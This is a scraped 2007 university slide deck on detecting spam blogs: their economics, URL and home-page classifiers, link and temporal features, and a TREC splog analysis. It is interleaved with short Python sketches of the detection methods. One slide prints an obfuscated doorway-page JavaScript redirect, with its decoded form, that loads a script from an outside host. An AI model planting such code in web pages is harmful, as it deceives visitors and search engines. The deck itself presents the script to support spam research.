Pranam Kolari, Tim Finin, Akshay Java, Anupam Joshi
March 25, 2007
• Spam on the Internet
– Variants
– Social Media Spam
• Reason behind Spam in Blogs
• Detecting Spam Blogs
• Trends and Issues
• How can you help?
• Conclusions
Pranam Kolari is a UMBC PhD student. His dissertation is on spam blog detection, with tools developed in use by both academia and industry. He has active research interests in internal corporate blogs, the Semantic Web and blog analytics.
Akshay Java is a UMBC PhD student. His dissertation is on identifying influence and opinions in social media. His research interests include blog analytics, information retrieval, natural language processing and the Semantic Web.
Tim Finin is a UMBC Professor with over 30 years of experience in applying AI to information systems, intelligent interfaces and robotics. Current interests include social media, the Semantic Web and multi-agent systems.
Anupam Joshi is a UMBC Professor with research interests in the broad area of networked computing and intelligent systems. He currently serves on the editorial board of the International Journal of the Semantic Web and Information.
• Early form seen around 1992 with MAKE MONEY FAST
• 80-85% of all e-mail traffic is spam
• In numbers
– 2005 (June): 30 billion per day
– 2006 (June): 55 billion per day
– 2006 (December): 85 billion per day
– 2007 (February): 90 billion per day
Sources: IronPort, Wikipedia
http://www.ironport.com/company/ironport_pr_2006-06-28.html
• “Unsolicited usually commercial e-mail sent to a large number of addresses” – Merriam Webster Online
• “Spamming is the abuse of electronic messaging systems to send unsolicited bulk messages, which are almost universally undesired.” – Wikipedia
• As the Internet has supported new applications, many other forms are common, requiring a much broader definition
Capturing user attention unjustifiably on the Internet (E-mail, Web, Social Media etc.)
[Figure: taxonomy of Internet Spam, organized by forms and by mechanisms (Direct, Indirect). Labels: E-Mail Spam, General Web Spam, Spam Blogs (Splogs), IM Spam (SPIM), Community Spam, Comment Spam, Tag Spam]
• Compromises Relevance and Importance Scores used by Search Engines
• Mostly affects the long tail of keywords (more susceptible)
• Spam in Blogs is a form of spamdexing
• 20% of the indexed Web (2005)
“We use the term spamming (also, spamdexing) to refer to any deliberate human action that is meant to trigger an unjustifiably favorable relevance or importance for a page, considering the page’s true value” – Gyongyi et al.
• Sybil attack – “in computer security is an attack wherein a reputation system is subverted by forging identities in peer-to-peer networks” – Wikipedia
• Users that sell
– http://usersubmitter.com $20, plus $1 per digg
– Spike the vote, site sold on eBay, bought by digg user, finally shut down by digg
– Geekforlife, a top 100 digg user, sold his account for $822 on eBay
• In addition to direct spam, a DIGG popular page also results in high ranking on search engines (Spamdexing)
“Why Are People Fascinated By Photographs of Crowds?”
• Author Submits Story
• 4 hours later only one DIGG on the story
• Seeks out User/Submitter
• 12 hours later a DIGG Popular Story
• Social Bookmark Tools
– del.icio.us spam in long tail
– Furl popular page spam
• Also used for spamdexing
• Fake Profile Image
• Fake users
• Fake site visits
• Fake co-authors
• Add friends
• Comment Spam
Widget Spam
Admiration Spam!?
• MySpace is the (5th) 4th highest visited site
• Direct User Targeting
– Free Products
– CAMS
The Hoodia Scam
• Create an “interesting” profile
• Aggressively add friends (+Sybil Attacks)
• Wall Hoodia Comments
• Community Oriented Spam extends across almost all tools
It does not take long for spammers to exploit a new form of social media
– Wiki(pedia) Spam: the Wikipedia community deletes spam articles and pages
– Guestbook Spam: yes, some still have guestbooks and they attract spam entries
– IRC spam: bots on IRC channels send you unwanted messages
– Second Life spam: notecards pop up with unwanted messages
– Twitter spam: it appeared about a week after Twitter went big time
– Semantic web spam: this one has not yet been seen
• Identify Profitable Contexts
• Create multiple doorway pages (or blogs)
• Spamdex doorways
– Target Relevance Scores
  • TFIDF
  • Meta-tag
– Target Importance Scores
  • PageRank
• (Or) Game Sponsored Search
– Search Engine Arbitrage
• Monetize
– Affiliate Programs
– Contextual Advertisements
Doorway Page for “Student Loan Consolidation”
10K in-links!
Browser Javascript Redirect for Users
eval(unescape("%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%22%3c%73%63%72%69%70%74%20%73%72%63%3d%27%68%74%74%22%2b%22%70%3a%2f%2f%62%69%67%22%2b%22%68%71%2e%69%6e%66%6f%2f%73%74%61%74%73%32%2e%70%68%70%3f%69%22%2b%22%64%3d%31%32%26%67%72%6f%75%70%3d%32%27%3e%3c%2f%73%63%72%69%70%74%22%2b%22%3e%22%29%3b"))
document.write("<script src='htt"+"p://big"+"hq.info/stats2.php?i"+"d=12&group=2'></script"+">");
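The escaped string passed to `unescape` above is plain percent-encoding, so an analyst can reveal the hidden `document.write` call without running the script. The following is a minimal sketch of that decoding step; the helper name `decode_layer` is an assumption made for illustration, and only a short prefix of the payload is used.

```python
from urllib.parse import unquote

def decode_layer(escaped: str) -> str:
    """Undo one layer of %XX escaping (hypothetical helper, for illustration).

    For ASCII payloads like the one on the slide, this matches what the
    browser's unescape() would produce.
    """
    return unquote(escaped)

# Short prefix of the escaped payload; the rest decodes the same way.
prefix = "%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65"
print(decode_layer(prefix))  # document.write
```

A filter that inspects only the raw page text would miss the redirect target, which is one reason such scripts are obfuscated in the first place.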
“LEADS” to affiliates highly profitable
[Figure: diagram connecting the following labels: Spam pages, Spam Blogs, Spam Comments, Guestbook Spam, Wiki Spam; in-links; spamdex; Spam pages, Spam Blogs [DOORWAY]; Search Engines; SERP; JavaScript Redirect [Previously Cloaking]; ads/affiliate links; arbitrage; Affiliate Programs, Context Ads; Affiliate Program Buyers]
• Spam Blogs
– Quickly indexed by search engines (ping servers)
– Can be hosted on third party services with high authority and trust (e.g. blogspot)
– Search engines show a higher preference for blogs in crawling and ranking
• Spam Comments
– In-links from high-authority blog sites that are indexed frequently
– “no-follow” not universally used
• In both cases blogs provide quicker return on investment to spammers
1. Mountain View, CA
2. Washington DC
3. San Francisco, CA
4. Orlando, FL
5. Lansing, MI
56% of all blogs are splogs! Silicon Valley or Splog Valley?
• Sampled weblogs.com during the last week of January
• 8.3 Million Pings
• Used existing splog detection tools
• Around 10% error rate
auto buy california cancer card casino cheap consolidation credit debt diet discount equipment
estate finance florida forex free gift golf health
hotel insurance jewelry lawyer loan loans
medical money mortgage new online phone poker rental sale software texas trading travel used vacation video wedding
High PPC contexts are primary spam drivers
• Splogs reduce user trust in social web ranking, making users visit web pages they could well do without
• Splog content is often plagiarized
• Splogs demote the value of authentic content
• Splogs steal advertising (referral) revenue from authentic content producers
• Splogs stress the blogosphere infrastructure
• Splogs skew results of market research tools
“Honestly, Do you think people who make $10k/month from adsense make blogs manually? Come on, they need to make them as fast as possible. Save Time = More Money! It's Common SENSE! How much money do you think you will save if you can increase your work pace by a hundred times? Think about it…”
“Discover The Amazing Stealth Traffic Secrets Insiders Use To Drive Thousands Of Targeted Visitors To Any Site They Desire!”
“Holy Grail Of Advertising...”
“Easily Dominate Any Market, Any Search Engine, Any Keyword.” $197
Our splog bait was picked up and used by dozens of sploggers
• Content Source
– Plagiarized
– Article Directories
• Content Manipulation
– Dictionary
– Word Shuffling
– Sentence Shuffling
• Multi-lingual Support!
• However, Pro-sploggers don’t use these tools
[Figure: numbered diagram (steps 1 to 4). Labels: Update Pings, Ping Stream, Update Stream, Fetch Content]
• Captcha Breaker
• Computer
• Content
• Affiliate Accounts
Given a blog identified by its URL X, is it spam?
How is this different from other spam detection problems?
What and When of filtering
[Figure: four panels, E-mail Spam, Web Spam, Social Network Spam and Spam Blogs; axis labels: time, posts, friends]
Constraints on the Filter
Who actively uses it?
• E-mail Spam: Users, E-mail Service Providers
• Web Spam: Search Engines, Page Hosting Services (e.g. Tripod)
• Spam Blogs: Web Search Engines, Blog Search Engines, Blog Hosting Services, (Ping Servers)
• Social Network Spam: Community Sites
• Fast Detection• Low Overhead• Online
• Batch Detection• Mostly Offline
• Fast Detection• Low Overhead
• Fast Detection• Batch Detection
Adversarial Attacks on the Filter
• E-mail Spam: Image Spam, Character Replacement
• Web Spam: Scripts, Doorways
• Spam Blogs: Scripts, Doorways, Deceptive Behavior
• Social Network Spam: Deceptive Behavior
• Pre-indexing at Ping Stream
• Post-indexing
• Blacklists/Whitelists
• URL Based Features
• Home-Page Based Features
• Feed Based Features (Temporal)
• Link Based Features
Filters deployed on Ping Streams (typically)..
• Intuition: Most self-hosted blogs are tied to “spammer-friendly” domain hosting services
• Map Ping URLs to IP Addresses
• Rank IP Addresses by hosted blogs
• Pick the top 100 (say)
– Randomly sample for a subset of blogs
– Verify no false positives
– Add IP to Blacklist
• Actively used by a2b.cc and many others
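The first steps of this blacklist procedure (map ping URLs to IPs, rank IPs by hosted blogs, pick the top candidates) can be sketched as follows. This is an illustrative sketch only: the function name `rank_ips`, the injected `resolve` callable and the example hosts are assumptions, and the sampling and manual verification steps remain human work.

```python
from collections import Counter
from urllib.parse import urlparse

def rank_ips(ping_urls, resolve):
    """Return (ip, number_of_distinct_blog_hosts) pairs, busiest IP first.

    `resolve` is any callable mapping a hostname to an IP string or None.
    In practice it could wrap socket.gethostbyname; here it is injected so
    the sketch runs without network access.
    """
    hosts_by_ip = {}
    for url in ping_urls:
        host = urlparse(url).hostname
        if host is None:
            continue
        ip = resolve(host)
        if ip is not None:
            hosts_by_ip.setdefault(ip, set()).add(host)
    counts = Counter({ip: len(hosts) for ip, hosts in hosts_by_ip.items()})
    return counts.most_common()

# Hypothetical ping data and a fake DNS table, for illustration only.
fake_dns = {"a.example": "10.0.0.1", "b.example": "10.0.0.1", "c.example": "10.0.0.2"}
pings = ["http://a.example/", "http://b.example/post", "http://c.example/", "http://a.example/2"]
ranked = rank_ips(pings, fake_dns.get)
candidates = ranked[:100]  # top candidates still need sampling and manual review
```

Counting distinct hosts rather than raw pings keeps one very active blog from pushing its IP up the ranking.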
Models over name and URL values can be very effective
• The Blogspot “?” filter
• The hyphen filter
• .. and many more
• Very effective and fast
• A reactive measure
• Active Supervision
• Highly susceptible to Adversarial Attacks
Text token based features over name and URL can be very effective
• Intuition: Spammers target search engines through context rich URLs
• No page fetches – can be very fast
• Techniques vary
– How are URLs segmented
  • Hyphens, forward slashes etc.
  • Supervised Segmentation Technique
  • Character N-grams
– How are detection models constructed
  • SVMs
  • Bayesian Filters
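Two of the segmentation options listed above, delimiter splitting and character n-grams, might look like the sketch below. The function names, the choice of n = 4 and the example URL are assumptions for illustration, not details taken from the talk.

```python
import re

def delimiter_tokens(url):
    """Split a URL on runs of non-alphanumeric characters (hyphens, slashes, dots)."""
    return [t for t in re.split(r"[^a-z0-9]+", url.lower()) if t]

def char_ngrams(url, n=4):
    """Set of overlapping character n-grams, usable as binary features."""
    s = url.lower()
    return {s[i:i + n] for i in range(len(s) - n + 1)}

print(delimiter_tokens("http://cheap-loans.example.com/best-rates"))
# ['http', 'cheap', 'loans', 'example', 'com', 'best', 'rates']
```

Neither function fetches the page, which is what makes URL-only features cheap enough to apply to every ping.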
• Motivation: Spammers glue words in URL
• Learn Segmentation using spamming contexts as proposed by Salvetti et al.
Example: http://dietsthatwork.blogspot.com
Naïve Approach: http, dietsthatwork, blogspot, com
Enhanced Approach: http, diets that work, blogspot, com
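To make the difference between the two approaches concrete, the sketch below splits a glued token with a small dictionary and dynamic programming. This is a swapped-in stand-in, not the learned segmentation of Salvetti et al.; the vocabulary and the function name `segment` are assumptions for illustration.

```python
def segment(token, vocabulary):
    """Split `token` into vocabulary words using the fewest pieces.

    Returns a list of words, or None when no full segmentation exists.
    """
    best = [None] * (len(token) + 1)  # best[i] = fewest-word split of token[:i]
    best[0] = []
    for end in range(1, len(token) + 1):
        for start in range(end):
            piece = token[start:end]
            if best[start] is not None and piece in vocabulary:
                candidate = best[start] + [piece]
                if best[end] is None or len(candidate) < len(best[end]):
                    best[end] = candidate
    return best[len(token)]

# Hypothetical vocabulary of spam-context words.
vocab = {"diet", "diets", "that", "hat", "work", "at"}
print(segment("dietsthatwork", vocab))  # ['diets', 'that', 'work']
```

A token that cannot be fully covered by the vocabulary returns None, in which case a caller could fall back to the unsegmented token, as the naïve approach does.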
• Train a Bayesian Classifier (10K +, 10K -)
• 1k test samples
• F-measure 76% spam, 79% authentic
• Human Baseline 73% spam, 78% authentic
• Classifier beats humans when identifying spam using URLs alone!
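A Bayesian classifier over URL tokens can be sketched in a few lines. The version below is a generic multinomial naive Bayes with add-one smoothing, offered as an assumption about the general technique rather than the authors' implementation; the class name and the tiny training set are invented for illustration.

```python
import math
from collections import Counter

class NaiveBayes:
    """Minimal two-class naive Bayes over token lists (illustrative sketch)."""

    def __init__(self):
        self.token_counts = {"spam": Counter(), "authentic": Counter()}
        self.doc_counts = Counter()

    def train(self, tokens, label):
        self.token_counts[label].update(tokens)
        self.doc_counts[label] += 1

    def classify(self, tokens):
        # Assumes at least one training example per class.
        vocab = set(self.token_counts["spam"]) | set(self.token_counts["authentic"])
        total_docs = sum(self.doc_counts.values())
        scores = {}
        for label, counts in self.token_counts.items():
            total = sum(counts.values())
            score = math.log(self.doc_counts[label] / total_docs)
            for t in tokens:
                # Add-one smoothing so unseen tokens do not zero out a class.
                score += math.log((counts[t] + 1) / (total + len(vocab)))
            scores[label] = score
        return max(scores, key=scores.get)

# Hypothetical training data: token lists from segmented URLs.
nb = NaiveBayes()
nb.train(["cheap", "loans", "blogspot"], "spam")
nb.train(["forex", "trading", "blogspot"], "spam")
nb.train(["my", "journal", "typepad"], "authentic")
nb.train(["travel", "diary", "blogspot"], "authentic")
```

With this toy data, `nb.classify(["cheap", "forex"])` returns "spam" and `nb.classify(["my", "diary"])` returns "authentic"; real performance depends on a training set of the size quoted on the slide.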
blogdrive weblog indiatimes public name podcast radio topix directory
info medical rental forex insurance wedding seo auto channel
• SVM based approach
• Hand Verified Samples of 2K spam URLs and 2K authentic URLs from ping server
• N-character gram tokenization
• Linear Kernel
• Binary Features
• F-measure ~ 90%
program brand consumer today users journal blog blogspot typepad
domain answer groups ford acne reviews loan share hoodia
• Intuition: Home-Page can provide a good snapshot of a blog (most recent posts), and also captures blog-rolls and link-rolls
• Only one page fetch per URL – can be very fast
• Techniques vary by selected features
– Bag-of-words
– Bag-of-tokenized-outlinks
– Text Compression
![Page 75: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/75.jpg)
Scraped content typically lacks the personal nature of blog posts
![Page 76: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/76.jpg)
• SVM based model
– Binary Features
– Linear Kernel
• Hand-verified training set of blogs and splogs
– 700 blogs and 700 splogs
• F-measure ~ 88%
wewhatwasmyorgflickrpaperwords
findinfonewsyouranotherwebsitebestarticles
weblogmotionmethankgojanuarytrackbackarchives
perfectproductsuncategorizedhotresourcesincthreecopyright
![Page 77: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/77.jpg)
2-comments, to-the, it-was, also-added, 1-comment, 3-comments
comments-off, in-uncategorized, categories-uncategorized, new-york
• Features created using two adjacent words
• Less susceptible to adversarial attacks
• SVM based model
– Binary Features
– Linear Kernel
• F measure ~ 86%
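Features built from two adjacent words can be generated as in the sketch below. The hyphen-joined naming follows the examples on this slide; the lowercasing and the tokenization regex are assumptions.

```python
import re

def word_bigrams(text):
    """Return the set of adjacent-word pairs, joined with a hyphen."""
    words = re.findall(r"[a-z0-9]+", text.lower())
    return {f"{a}-{b}" for a, b in zip(words, words[1:])}

print(sorted(word_bigrams("2 Comments to the post")))
```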
![Page 78: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/78.jpg)
• Features constructed by tokenizing outgoing URLs
• Similar to (earlier) URL-only models but captures more context
– URL tokens in the badge crazy blogosphere
– Default WordPress links
• F-measure ~ 82%
technorati, flickr, feedburner, blogrolling, …
dougal, boren, zed1, photomatt
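Tokenizing the outgoing URLs of a blog home page might be sketched as follows, using only the Python standard library. Skipping relative and same-host links is an assumption about what counts as an out-link; `home_host` and the sample HTML are illustrative.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

class LinkCollector(HTMLParser):
    """Collect href values from anchor tags."""

    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.links.append(value)

def outlink_tokens(html, home_host):
    """Return the bag (as a set) of tokens from external link URLs."""
    collector = LinkCollector()
    collector.feed(html)
    tokens = set()
    for link in collector.links:
        parsed = urlparse(link)
        host = parsed.netloc.lower()
        if not host or host == home_host:
            continue  # relative or internal link, not an out-link
        text = (host + parsed.path).lower()
        tokens.update(t for t in re.split(r"[^a-z0-9]+", text) if t)
    return tokens

page = ('<a href="http://www.flickr.com/photos/me">photos</a>'
        '<a href="/about">about</a>'
        '<a href="http://technorati.com/">technorati</a>')
print(sorted(outlink_tokens(page, "example.blogspot.com")))
```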
![Page 79: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/79.jpg)
• We have been experimenting with multiple approaches
• Dataset available at:
– http://ebiquity.umbc.edu/resource/html/id/212
![Page 80: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/80.jpg)
Post 1 from a Spam Blog on Forex Trading
![Page 81: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/81.jpg)
Post 2 from the same Spam Blog on Forex Trading
![Page 82: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/82.jpg)
• Intuition: Splogs feature highly correlated content across multiple posts (text, out-links, etc.)
• Lin et al. have proposed and analyzed useful metrics to identify such correlations
• Two fetches per URL – can exploit structured feed entries
• Precision ~ 86%, Recall ~ 47%
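One simple way to quantify correlation between two posts is the Jaccard overlap of their word sets, sketched below. This is a stand-in chosen for illustration, not the metrics of Lin et al., which are not reproduced in these slides.

```python
import re

def jaccard(a, b):
    """Jaccard similarity of two sets; 0.0 when both are empty."""
    union = a | b
    return len(a & b) / len(union) if union else 0.0

def post_similarity(post_a, post_b):
    """Word-set overlap between two posts of the same blog."""
    def words(text):
        return set(re.findall(r"[a-z0-9]+", text.lower()))
    return jaccard(words(post_a), words(post_b))

print(post_similarity("Forex trading tips", "forex trading signals"))  # 0.5
```

The same `jaccard` helper could be applied to sets of out-link tokens instead of words.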
![Page 83: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/83.jpg)
• Outgoing Anchors
• Character N-grams and Word N-grams
• Named Entity Ratio
• Text Compression Ratio
• Pronoun Entity Ratio
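Of the features listed above, the text compression ratio is the easiest to sketch. The version below assumes the ratio is defined as uncompressed size over zlib-compressed size; the slides do not state the exact definition or compressor. Highly repetitive text yields a higher ratio.

```python
import zlib

def compression_ratio(text):
    """Uncompressed bytes divided by zlib-compressed bytes."""
    raw = text.encode("utf-8")
    if not raw:
        return 0.0
    return len(raw) / len(zlib.compress(raw))

repetitive = "buy cheap forex signals now " * 50
varied = " ".join(str((i * i * 7919) % 100003) for i in range(200))
print(compression_ratio(repetitive) > compression_ratio(varied))
```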
![Page 84: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/84.jpg)
![Page 85: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/85.jpg)
![Page 86: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/86.jpg)
![Page 87: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/87.jpg)
![Page 88: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/88.jpg)
Top 5
http://www.engadget.com 1942
http://www.huffingtonpost.com/theblog 905
http://www.crooksandliars.com 637
http://blogs.guardian.co.uk/news 616
http://www.littlegreenfootballs.com/weblog 611
Top 5
http://spaces.msn.com/members/pony-girl 505
http://spaces.msn.com/members/black-puss 505
http://spaces.msn.com/members/amputee-women 505
http://spaces.msn.com/members/free-stories 505
http://spaces.msn.com/members/first-time-girl 505
![Page 89: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/89.jpg)
Top 5
http://www.xanga.com/home.aspx?user=hit_me_layoutz 273
http://www.xanga.com/home.aspx?user=i_jock_layouts 271
http://www.xanga.com/home.aspx?user=slp_layouts_slp 198
http://spaces.msn.com/members/cyrustse1986 193
http://www.xanga.com/home.aspx?user=layouts_n_codes2005 180
Top 5
http://worldseriesofpokerchipscardguard.blogspot.com 898
http://rule-wsop.blogspot.com 898
http://worldseries-ofpoler.blogspot.com 898
http://qsopcom-1.blogspot.com 898
http://weopcom.blogspot.com 898
![Page 90: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/90.jpg)
• Test set of 700 authentic blogs and 700 splogs
• In-links from Technorati
• Out-links from blog-home page
• Labeled in-links/out-links to be a blog, splog, news site, other website
• 3 feature-types trained using SVMs
– In-link distribution
– Out-link distribution
– Co-citation distribution
• F-measure ~ 80%
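A link distribution feature can be read as the fraction of a blog's labeled in-links (or out-links) falling into each of the four classes. The sketch below follows that reading, which is an assumption; the slides do not define the feature vectors precisely.

```python
from collections import Counter

CLASSES = ("blog", "splog", "news", "other")

def link_distribution(labels):
    """Fraction of links per class, in the order given by CLASSES."""
    counts = Counter(labels)
    total = sum(counts[c] for c in CLASSES)
    if total == 0:
        return [0.0] * len(CLASSES)
    return [counts[c] / total for c in CLASSES]

# Labels of the pages that link to one blog (illustrative data).
print(link_distribution(["splog", "splog", "blog", "news"]))
# [0.25, 0.5, 0.25, 0.0]
```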
![Page 91: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/91.jpg)
![Page 92: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/92.jpg)
Ping Stream → BLACKLISTS / WHITELISTS → REGEX → URL MODEL → TEXT MODEL → TEMPORAL MODEL (increasing cost)
• BLACKLISTS / WHITELISTS: Check with known blogs and splogs
• REGEX: Check known regex patterns
• URL MODEL: Use models over text of URL
• TEXT MODEL: Use models over Blog home-page
• TEMPORAL MODEL: Use models over post correlation
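The filtering stages, ordered by increasing cost, can be sketched as a cascade that stops at the first stage able to decide. The function name, the return convention (a model returns `None` when unsure) and the stub models are assumptions made for illustration.

```python
import re

def classify_ping(url, blacklist, whitelist, patterns, models):
    """Return (label, stage) for a pinged URL.

    models is a list of (name, callable) pairs ordered by cost; each
    callable returns "splog", "blog", or None when it cannot decide.
    """
    if url in blacklist:
        return "splog", "blacklist"
    if url in whitelist:
        return "blog", "whitelist"
    if any(re.search(p, url) for p in patterns):
        return "splog", "regex"
    for name, model in models:
        verdict = model(url)
        if verdict is not None:
            return verdict, name
    return "unknown", "none"

# Stub models standing in for the URL, home-page and post-correlation models.
models = [
    ("url_model", lambda u: "splog" if "forex" in u else None),
    ("homepage_model", lambda u: "blog"),
]
print(classify_ping("http://rule-wsop.blogspot.com", set(), set(), [r"-wsop\."], models))
```

Cheap checks run first so that the expensive page fetches are only needed for URLs the earlier stages could not resolve.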
![Page 93: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/93.jpg)
![Page 94: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/94.jpg)
“So, whats that mean for the current users? It means that we have a few things to iron out. We are working on them sa fast as possible. It will insure that we dont have these issues going forward in the future and have a solid solution. “
SPLOG REPORTER STATUS = RED
“Due to lack of resources, mainly time, we have decided to pursue other web 2.0 interests. We had a good run and appreciate everyone who supported the splog fighting movement. We have decided to keep the site up so as not to "break the web" and all the links to the site. If anyone is interested in acquiring Splog Reporter please contact us.”
FIGHTING SPLOG
![Page 95: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/95.jpg)
Eliminating splogs depends directly on blacklisting by search engines, contextual advertisement services and affiliates. Once blacklisted, sploggers have no more incentive to host such blogs and typically bring them down.
... a rather slow elimination process.
![Page 96: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/96.jpg)
![Page 97: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/97.jpg)
Nature of Splogs in TREC 2006
• Around 83K identifiable blogs in the collection, with 3.2M permalinks
• We identified 13,542 splogs
• Blacklisted 543K permalinks from these splogs
• This accounts for 16% of the entire collection
• Results tally, in percentage terms, with those reported for the TREC dataset (Macdonald et al. 2006)
![Page 98: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/98.jpg)
Impact of Splogs in TREC Queries
[Chart: legend entries 851–897 (apparently TREC query numbers); one axis ticked 5 to 100 in steps of 5, the other 0 to 120]
![Page 99: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/99.jpg)
Higher in Spam Prone Contexts
[Chart: legend entries 1–28; one axis ticked 5 to 100 in steps of 5, the other 0 to 120]
![Page 100: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/100.jpg)
![Page 101: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/101.jpg)
• When did you start seeing spam? in 2005 – on blog search engine results.
• How much spam? (in percents) roughly 25% of top retrieval results
• Is it increasing/decreasing? increasing
• How are you tackling it? and How much effort goes into it? definitely my team considers this an important research effort. In terms of person-hrs, at least 2080 in 2006
• Do you have any new architectures/frameworks/initiatives? Yes – work publicly available
• What would you want researchers to address? temporal and structural properties
• What are future trends? collaborative splog detection
